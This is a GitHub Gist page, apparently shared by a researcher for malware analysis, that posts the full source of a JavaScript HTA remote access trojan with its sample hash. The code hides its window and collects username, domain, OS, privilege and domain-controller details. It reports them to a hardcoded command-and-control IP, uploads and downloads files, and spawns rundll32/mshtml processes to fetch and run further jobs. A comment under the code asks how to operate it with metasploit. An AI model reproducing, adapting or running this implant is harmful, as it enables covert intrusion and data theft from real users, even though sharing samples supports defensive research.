Created
February 9, 2018 17:05
-
-
Save JohnLaTwC/4315bbbd89da0996f5c08c032b391799 to your computer and use it in GitHub Desktop.
JavaScript RAT
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## uploaded by @JohnLaTwC | |
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde | |
<html> | |
<head> | |
<script language="JScript"> | |
window.resizeTo(1, 1); | |
window.moveTo(-2000, -2000); | |
window.blur(); | |
try | |
{ | |
window.onfocus = function() { window.blur(); } | |
window.onerror = function(sMsg, sUrl, sLine) { return false; } | |
} | |
catch (e){} | |
var JPTUDBSTOW = | |
{ | |
FS : new ActiveXObject("Scripting.FileSystemObject"), | |
WS : new ActiveXObject("WScript.Shell"), | |
STAGER : "http://104.238.179.183:9999/hoVgt", | |
SESSIONKEY : "bd19aa8e9b4a40ab9db982f82775fc8c", | |
JOBKEY : "", | |
JOBKEYPATH : "http://104.238.179.183:9999/hoVgt?sid=bd19aa8e9b4a40ab9db982f82775fc8c;csrf=" | |
}; | |
/** | |
* Sleeps the current thread | |
* | |
* @param int ms - how long to sleep in milliseconds | |
* @param function callback - where to continue execution after the sleep | |
* | |
* @return void | |
*/ | |
JPTUDBSTOW.sleep = function(ms, callback) | |
{ | |
if (JPTUDBSTOW.isHTA()) | |
{ | |
window.setTimeout(callback, ms); | |
} | |
else | |
{ | |
var now = new Date().getTime(); | |
while (new Date().getTime() < now + ms); | |
callback(); | |
} | |
} | |
/** | |
* Attempts to kill the current process using a myriad of methods | |
* | |
* @return void | |
*/ | |
JPTUDBSTOW.exit = function() | |
{ | |
if (JPTUDBSTOW.isHTA()) | |
{ | |
// crappy hack? | |
try { | |
window.close(); | |
} catch(e){} | |
try { | |
window.self.close(); | |
} catch (e){} | |
try { | |
window.top.close(); | |
} catch (e){} | |
try{ | |
self.close(); | |
} catch (e){} | |
try | |
{ | |
window.open('', '_self', ''); | |
window.close(); | |
} | |
catch (e) | |
{ | |
} | |
} | |
try | |
{ | |
WScript.quit(); | |
} | |
catch (e) | |
{ | |
} | |
try | |
{ | |
var pid = JPTUDBSTOW.process.currentPID(); | |
JPTUDBSTOW.process.kill(pid); | |
} | |
catch (e) | |
{ | |
} | |
} | |
/** | |
* Determine if running in HTML Application context | |
* | |
* @return bool - true if HTML application context | |
*/ | |
JPTUDBSTOW.isHTA = function() | |
{ | |
return typeof(window) !== "undefined"; | |
} | |
/** | |
* Determine if running in WScript Application context | |
* | |
* @return bool - true if WScript context | |
*/ | |
JPTUDBSTOW.isWScript = function() | |
{ | |
return typeof(WScript) !== "undefined"; | |
} | |
JPTUDBSTOW.user = {}; | |
JPTUDBSTOW.user.isElevated = function() | |
{ | |
try | |
{ | |
JPTUDBSTOW.WS.RegRead("HKEY_USERS\\s-1-5-19\\"); | |
return true; | |
} | |
catch(e) | |
{ | |
return false; | |
} | |
} | |
JPTUDBSTOW.user.OS = function() | |
{ | |
try | |
{ | |
var wmi = GetObject("winmgmts:\\\\.\\root\\CIMV2"); | |
var colItems = wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem"); | |
var enumItems = new Enumerator(colItems); | |
var objItem = enumItems.item(); | |
return objItem.Caption; | |
} | |
catch(e){} | |
return "Unknown"; | |
} | |
JPTUDBSTOW.user.DC = function() | |
{ | |
try | |
{ | |
var DC = JPTUDBSTOW.WS.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName"); | |
if (DC.length > 0) | |
return DC; | |
} | |
catch(e) | |
{ | |
} | |
return "Unknown"; | |
} | |
JPTUDBSTOW.user.Arch = function() | |
{ | |
try | |
{ | |
var wmi = GetObject("winmgmts:\\\\.\\root\\CIMV2"); | |
var colItems = wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem"); | |
var enumItems = new Enumerator(colItems); | |
var objItem = enumItems.item(); | |
return objItem.OSArchitecture; | |
} | |
catch(e){} | |
return "Unknown"; | |
} | |
JPTUDBSTOW.user.CWD = function() | |
{ | |
try | |
{ | |
cwd = JPTUDBSTOW.shell.exec("cd", "%TEMP%\\cwd.txt"); | |
return cwd; | |
} | |
catch(e) | |
{} | |
return ""; | |
} | |
JPTUDBSTOW.user.info = function() | |
{ | |
var net = new ActiveXObject("WScript.Network"); | |
var info = net.UserDomain + "\\" + net.Username; | |
if (JPTUDBSTOW.user.isElevated()) | |
info += "*"; | |
info += "~~~" + net.ComputerName; | |
info += "~~~" + JPTUDBSTOW.user.OS(); | |
info += "~~~" + JPTUDBSTOW.user.DC(); | |
info += "~~~" + JPTUDBSTOW.user.Arch(); | |
info += "~~~" + JPTUDBSTOW.user.CWD(); | |
return info; | |
} | |
JPTUDBSTOW.work = {}; | |
/* | |
JPTUDBSTOW.work.applyDefaultHeaders = function(headers) | |
{ | |
var headers = (typeof(headers) !== "undefined") ? headers : {}; | |
headers["SESSIONKEY"] = JPTUDBSTOW.SESSIONKEY; | |
headers["JOBKEY"] = JPTUDBSTOW.JOBKEY; | |
} | |
*/ | |
/** | |
* Reports a successful message to the stager | |
* | |
* @param string data - The post body | |
* @param map headers - Any additional HTTP headers | |
* | |
* @return object - the HTTP object | |
*/ | |
JPTUDBSTOW.work.report = function(data, headers) | |
{ | |
//var headers = JPTUDBSTOW.work.applyDefaultHeaders(headers); | |
return JPTUDBSTOW.http.post(JPTUDBSTOW.work.make_url(), data, headers); | |
} | |
/** | |
* Reports an error condition to the stager | |
* | |
* @param exception e - what exception was thrown | |
* | |
* @return object - the HTTP object | |
*/ | |
JPTUDBSTOW.work.error = function(e) | |
{ | |
try | |
{ | |
var headers = {}; | |
headers["errno"] = (e.number) ? e.number : "-1"; | |
headers["errname"] = (e.name) ? e.name : "Unknown"; | |
headers["errdesc"] = (e.description) ? e.description : "Unknown"; | |
return JPTUDBSTOW.work.report(e.message, headers); | |
} | |
catch (e) | |
{ | |
// Abandon all hope ye who enter here | |
// For this is where all things are left behind | |
} | |
} | |
/** | |
* Makes the stager callhome URL for a specific jobkey | |
* | |
* @param string jobkey - which job to fetch | |
* | |
* @return string - the stager callhome URL | |
*/ | |
JPTUDBSTOW.work.make_url = function(jobkey) | |
{ | |
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : JPTUDBSTOW.JOBKEY; | |
return JPTUDBSTOW.JOBKEYPATH + jobkey + ";"; | |
} | |
/** | |
* Fetches the next job from the server | |
* | |
* @return object - the HTTP object | |
*/ | |
JPTUDBSTOW.work.get = function() | |
{ | |
var url = JPTUDBSTOW.work.make_url(); | |
return JPTUDBSTOW.http.post(url); | |
} | |
/** | |
* Forks a new process and runs the specific jobkey | |
* | |
* @param string jobkey - the job to fetch/run | |
* @param bool fork32Bit - ensure new process is x86 | |
* | |
* @return void | |
*/ | |
JPTUDBSTOW.work.fork = function(jobkey, fork32Bit) | |
{ | |
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false; | |
var cmd = "rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication"; | |
if (fork32Bit) | |
cmd = JPTUDBSTOW.file.get32BitFolder() + cmd; | |
cmd = cmd.replace("***K***", JPTUDBSTOW.work.make_url(jobkey)); | |
JPTUDBSTOW.WMI.createProcess(cmd); | |
//JPTUDBSTOW.WS.Run(cmd, 0, false); | |
} | |
JPTUDBSTOW.http = {}; | |
JPTUDBSTOW.http.create = function() | |
{ | |
var http = null; | |
try | |
{ | |
http = new ActiveXObject("Microsoft.XMLHTTP"); | |
} | |
catch (e) | |
{ | |
http = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); | |
http.setTimeouts(30000, 30000, 30000, 0) | |
} | |
return http; | |
} | |
JPTUDBSTOW.http.addHeaders = function(http, headers) | |
{ | |
var headers = (typeof(headers) !== "undefined") ? headers : {}; | |
var content = false; | |
for (var key in headers) | |
{ | |
var value = headers[key]; | |
http.setRequestHeader(key, value); | |
if (key.toUpperCase() == "CONTENT-TYPE") | |
content = true; | |
} | |
if (!content) | |
http.setRequestHeader("Content-Type", "application/octet-stream"); | |
} | |
JPTUDBSTOW.http.post = function(url, data, headers) | |
{ | |
var data = (typeof(data) !== "undefined") ? data : ""; | |
var http = JPTUDBSTOW.http.create(); | |
http.open("POST", url, false); | |
JPTUDBSTOW.http.addHeaders(http, headers); | |
http.send(data); | |
return http; | |
} | |
JPTUDBSTOW.http.get = function(url, headers) | |
{ | |
var http = JPTUDBSTOW.http.create(); | |
http.open("GET", url, false); | |
JPTUDBSTOW.http.addHeaders(http, headers); | |
http.send(); | |
return http; | |
} | |
/** | |
* Upload a file, off zombie, to stager | |
* | |
* @param filepath - the full path to the file to send | |
* @param header_uuid - a unique identifier for this file | |
* @param header_key - optional HTTP header tag to send uuid over | |
* | |
* @return object - the HTTP object | |
* | |
**/ | |
JPTUDBSTOW.http.upload = function(filepath, header_uuid, header_key) | |
{ | |
var key = (typeof(header_key) !== "undefined") ? header_key : "ETag"; | |
var data = JPTUDBSTOW.file.readBinary(filepath); | |
// we must replace null bytes or MS will cut off the body | |
data = data.replace(/\\/g, "\\\\"); | |
data = data.replace(/\0/g, "\\0"); | |
var headers = {}; | |
headers[key] = header_uuid; | |
return JPTUDBSTOW.work.report(data, headers); | |
} | |
JPTUDBSTOW.http.download = function(filepath, header_uuid, header_key) | |
{ | |
var key = (typeof(header_key) !== "undefined") ? header_key : "ETag"; | |
var headers = {}; | |
headers[key] = header_uuid; | |
return JPTUDBSTOW.http.downloadEx("POST", JPTUDBSTOW.work.make_url(), headers, filepath); | |
} | |
JPTUDBSTOW.http.downloadEx = function(verb, url, headers, path) | |
{ | |
if (verb == "GET") | |
{ | |
var http = JPTUDBSTOW.http.get(url, headers); | |
} | |
else | |
{ | |
var http = JPTUDBSTOW.http.post(url, "", headers); | |
} | |
var stream = new ActiveXObject("Adodb.Stream"); | |
stream.Type = 1; | |
stream.Open(); | |
stream.Write(http.responseBody); | |
var data = JPTUDBSTOW.http.bin2str(stream); | |
JPTUDBSTOW.file.write(path, data); | |
} | |
JPTUDBSTOW.http.bin2str = function(stream) | |
{ | |
stream.Flush(); | |
stream.Position = 0; | |
var bin = stream.Read(); | |
var rs = new ActiveXObject("Adodb.RecordSet"); | |
rs.Fields.Append("temp", 201, stream.Size); | |
rs.Open(); | |
rs.AddNew(); | |
rs("temp").AppendChunk(bin); | |
rs.Update(); | |
var data = rs.GetString(); | |
rs.Close(); | |
return data.substring(0, data.length - 1); | |
} | |
JPTUDBSTOW.process = {}; | |
JPTUDBSTOW.process.currentPID = function() | |
{ | |
var cmd = JPTUDBSTOW.file.getPath("%comspec% /K hostname"); | |
//JPTUDBSTOW.WS.Run(cmd, 0, false); | |
var childPid = JPTUDBSTOW.WMI.createProcess(cmd); | |
var pid = -1; | |
// there could be a race condition, but CommandLine returns null on win2k | |
// and is often null on later windows with more harsh privileges | |
// todo: this method is stupid. instead of using .Run, spawn a WMI process. | |
// then we get child PID for free and can backtrack PPID, no race condition | |
var latestTime = 0; | |
var latestProc = null; | |
var processes = JPTUDBSTOW.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
/* | |
if (proc.Name.indexOf("cmd") != -1) | |
{ | |
if (latestTime == 0 && proc.CreationDate) | |
latestTime = proc.CreationDate; | |
if (proc.CreationDate > latestTime) | |
{ | |
latestTime = proc.CreationDate; | |
latestProc = proc; | |
} | |
} | |
*/ | |
if (proc.ProcessId == childPid) | |
{ | |
latestProc = proc; | |
break; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
pid = latestProc.ParentProcessId; | |
latestProc.Terminate(); | |
return pid; | |
} | |
JPTUDBSTOW.process.kill = function(pid) | |
{ | |
var processes = JPTUDBSTOW.process.list(); | |
var items = new Enumerator(processes); | |
while (!items.atEnd()) | |
{ | |
var proc = items.item(); | |
try | |
{ | |
if (proc.ProcessId == pid) | |
{ | |
proc.Terminate(); | |
return true; | |
} | |
} catch (e) | |
{ | |
} | |
items.moveNext(); | |
} | |
return false; | |
} | |
JPTUDBSTOW.process.list = function() | |
{ | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2"); | |
var query = "Select * From Win32_Process"; | |
return wmi.ExecQuery(query); | |
} | |
// http://apidock.com/ruby/Win32/Registry/Constants | |
JPTUDBSTOW.registry = {}; | |
JPTUDBSTOW.registry.HKCR = 0x80000000; | |
JPTUDBSTOW.registry.HKCU = 0x80000001; | |
JPTUDBSTOW.registry.HKLM = 0x80000002; | |
JPTUDBSTOW.registry.STRING = 0; | |
JPTUDBSTOW.registry.BINARY = 1; | |
JPTUDBSTOW.registry.DWORD = 2; | |
JPTUDBSTOW.registry.QWORD = 3; | |
JPTUDBSTOW.registry.provider = function(computer) | |
{ | |
var computer = (typeof(computer) !== "undefined") ? computer : "."; | |
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv"); | |
return reg; | |
} | |
JPTUDBSTOW.registry.write = function(hKey, path, key, value, valType, computer) | |
{ | |
var reg = JPTUDBSTOW.registry.provider(computer); | |
reg.CreateKey(hKey, path); | |
if (valType == JPTUDBSTOW.registry.STRING) | |
reg.SetStringValue(hKey, path, key, value); | |
else if (valType == JPTUDBSTOW.registry.DWORD) | |
reg.SetDWORDValue(hKey, path, key, value); | |
else if (valType == JPTUDBSTOW.registry.QWORD) | |
reg.SetQWORDValue(hKey, path, key, value); | |
else if (valType == JPTUDBSTOW.registry.BINARY) | |
reg.SetBinaryValue(hKey, path, key, value); | |
} | |
JPTUDBSTOW.registry.read = function(hKey, path, key, valType, computer) | |
{ | |
var reg = JPTUDBSTOW.registry.provider(computer); | |
var methodName = ""; | |
if (valType == JPTUDBSTOW.registry.STRING) | |
methodName = "GetStringValue"; | |
else if (valType == JPTUDBSTOW.registry.DWORD) | |
methodName = "GetDWORDValue"; | |
else if (valType == JPTUDBSTOW.registry.QWORD) | |
methodName = "GetQWORDValue"; | |
else if (valType == JPTUDBSTOW.registry.BINARY) | |
methodName = "GetBinaryValue"; | |
if (methodName == "") | |
return; | |
var method = reg.Methods_.Item(methodName); | |
var inparams = method.InParameters.SpawnInstance_(); | |
inparams.hDefKey = hKey; | |
inparams.sSubKeyName = path; | |
inparams.sValueName = key; | |
var outparams = reg.ExecMethod_(method.Name, inparams); | |
return outparams; | |
} | |
JPTUDBSTOW.registry.destroy = function(hKey, path, key, computer) | |
{ | |
var reg = JPTUDBSTOW.registry.provider(computer); | |
var loc = (key == "") ? path : path + "\\" + key; | |
return reg.DeleteKey(hKey, loc); | |
} | |
/* | |
// DEPRECATED | |
JPTUDBSTOW.registry.create = function(hiveKey, path, key, computer) | |
{ | |
var computer = (typeof(computer) !== "undefined") ? computer : "."; | |
var sw = new ActiveXObject("WbemScripting.SWbemLocator"); | |
var root = sw.ConnectServer(computer, "root\\default"); | |
var reg = root.get("StdRegProv"); | |
var enumKey = reg.Methods_.Item("EnumKey"); | |
var inParams = enumKey.InParameters.SpawnInstance_(); | |
inParams.hDefKey = hiveKey; | |
inParams.sSubKeyName = path; | |
var outParam = reg.ExecMethod_(enumKey.Name, inParams); | |
if (outParam.ReturnValue != 0) | |
return false; | |
if (outParam.sNames) | |
{ | |
var subKeys = outParam.sNames.toArray(); | |
for (var i = 0; i < subKeys.length; ++i) | |
{ | |
if (subkeys[i].toUpperCase() == key.toUpperCase()) | |
return true; | |
} | |
} | |
var createKey = reg.Methods_.Item("CreateKey"); | |
var createArgs = createKey.InParameters.SpawnInstance_(); | |
createArgs.hDefKey = hiveKey; | |
createArgs.sSubKeyName = path + "\\" + key; | |
var createRet = reg.ExecMethod_(createKey.Name, createArgs); | |
return createRet.returnValue == 0; | |
} | |
*/ | |
JPTUDBSTOW.WMI = {}; | |
JPTUDBSTOW.WMI.createProcess = function(cmd) | |
{ | |
var SW_HIDE = 0; | |
var pid = 0; | |
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2") | |
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_(); | |
si.ShowWindow = SW_HIDE; | |
si.CreateFlags = 16777216; | |
si.X = si.Y = si.XSize = si.ySize = 1; | |
//wmi.Get("Win32_Process").Create(cmd, null, si, pid); | |
var w32proc = wmi.Get("Win32_Process"); | |
var method = w32proc.Methods_.Item("Create"); | |
var inParams = method.InParameters.SpawnInstance_(); | |
inParams.CommandLine = cmd; | |
inParams.CurrentDirectory = null; | |
inParams.ProcessStartupInformation = si; | |
var outParams = w32proc.ExecMethod_("Create", inParams); | |
return outParams.ProcessId; | |
} | |
JPTUDBSTOW.shell = {}; | |
JPTUDBSTOW.shell.exec = function(cmd, stdOutPath) | |
{ | |
var c = "%comspec% /q /c " + cmd + " 1> " + JPTUDBSTOW.file.getPath(stdOutPath); | |
c += " 2>&1"; | |
JPTUDBSTOW.WS.Run(c, 0, true); | |
var data = JPTUDBSTOW.file.readText(stdOutPath); | |
JPTUDBSTOW.file.deleteFile(stdOutPath); | |
return data; | |
} | |
JPTUDBSTOW.shell.run = function(cmd, fork) | |
{ | |
var fork = (typeof(fork) !== "undefined") ? fork : true; | |
var c = "%comspec% /q /c " + cmd; | |
JPTUDBSTOW.WS.Run(cmd, 0, !fork); | |
} | |
JPTUDBSTOW.file = {}; | |
JPTUDBSTOW.file.getPath = function(path) | |
{ | |
return JPTUDBSTOW.WS.ExpandEnvironmentStrings(path); | |
} | |
/** | |
* @return string - the system folder with x86 binaries | |
*/ | |
JPTUDBSTOW.file.get32BitFolder = function() | |
{ | |
var base = JPTUDBSTOW.file.getPath("%WINDIR%"); | |
var syswow64 = base + "\\SysWOW64\\"; | |
if (JPTUDBSTOW.FS.FolderExists(syswow64)) | |
return syswow64; | |
return base + "\\System32\\"; | |
} | |
JPTUDBSTOW.file.readText = function(path) | |
{ | |
var loopcount = 0; | |
while(true) | |
{ | |
if (JPTUDBSTOW.FS.FileExists(JPTUDBSTOW.file.getPath(path)) && JPTUDBSTOW.FS.GetFile(JPTUDBSTOW.file.getPath(path)).Size > 0) | |
{ | |
var fd = JPTUDBSTOW.FS.OpenTextFile(JPTUDBSTOW.file.getPath(path), 1, false, 0); | |
var data = fd.ReadAll(); | |
fd.Close(); | |
return data; | |
} | |
else | |
{ | |
loopcount += 1; | |
if (loopcount > 180) | |
{ | |
return ""; | |
} | |
JPTUDBSTOW.shell.run("ping 127.0.0.1 -n 2", false); | |
} | |
} | |
} | |
JPTUDBSTOW.file.readBinary = function(path) | |
{ | |
var fp = JPTUDBSTOW.FS.GetFile(JPTUDBSTOW.file.getPath(path)); | |
var fd = fp.OpenAsTextStream(); | |
var data = fd.read(fp.Size); | |
fd.close(); | |
return data; | |
} | |
JPTUDBSTOW.file.write = function(path, data) | |
{ | |
var fd = JPTUDBSTOW.FS.CreateTextFile(JPTUDBSTOW.file.getPath(path), true); | |
fd.write(data); | |
fd.close(); | |
} | |
JPTUDBSTOW.file.deleteFile = function(path) | |
{ | |
JPTUDBSTOW.FS.DeleteFile(JPTUDBSTOW.file.getPath(path), true); | |
};try | |
{ | |
if (JPTUDBSTOW.JOBKEY != "stage") | |
{ | |
if (JPTUDBSTOW.isHTA()) | |
{ | |
//HKCU\SOFTWARE\Microsoft\Internet Explorer\Style\MaxScriptStatements = 0xFFFFFFFF | |
var path = "SOFTWARE\\Microsoft\\Internet Explorer\\Styles"; | |
var key = "MaxScriptStatements"; | |
JPTUDBSTOW.registry.write(JPTUDBSTOW.registry.HKCU, path, key, 0xFFFFFFFF, JPTUDBSTOW.registry.DWORD); | |
} | |
JPTUDBSTOW.work.report(JPTUDBSTOW.user.info()); | |
JPTUDBSTOW.work.fork(""); | |
JPTUDBSTOW.exit(); | |
} | |
else | |
{ | |
if (JPTUDBSTOW.isHTA()) | |
DoWorkTimeout(); | |
else | |
DoWorkLoop(); | |
} | |
} | |
catch (e) | |
{ | |
// todo: critical error reporting | |
} | |
function DoWork() | |
{ | |
try | |
{ | |
var work = JPTUDBSTOW.work.get(); | |
// 201 = x64 or x86 | |
// 202 = force x86 | |
if (work.status == 201 || work.status == 202) | |
{ | |
if (work.responseText.length > 0) { | |
var jobkey = work.responseText; | |
JPTUDBSTOW.work.fork(jobkey, work.status == 202); | |
} | |
} | |
else // if (work.status == 500) // kill code | |
{ | |
return false; | |
} | |
} | |
catch (e) | |
{ | |
return false; | |
} | |
return true; | |
} | |
function DoWorkLoop() | |
{ | |
while (DoWork()) | |
; | |
JPTUDBSTOW.exit(); | |
} | |
function DoWorkTimeout() | |
{ | |
for (var i = 0; i < 10; ++i) | |
{ | |
if (!DoWork()) | |
{ | |
JPTUDBSTOW.exit(); | |
return; | |
} | |
} | |
//window.setTimeout(DoWorkTimeoutCallback, 0); | |
JPTUDBSTOW.work.fork(""); | |
JPTUDBSTOW.exit(); | |
} | |
</script> | |
<hta:application caption="no" showInTaskBar="no" windowState="minimize" | |
navigable="no" scroll="no" /> | |
<!-- --> | |
</head> | |
<body> | |
</body> | |
</html> |
crazy this is still used in 2020..
is it?
just seen it used in 2022
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
How to control it with metasploit and how to setup this code?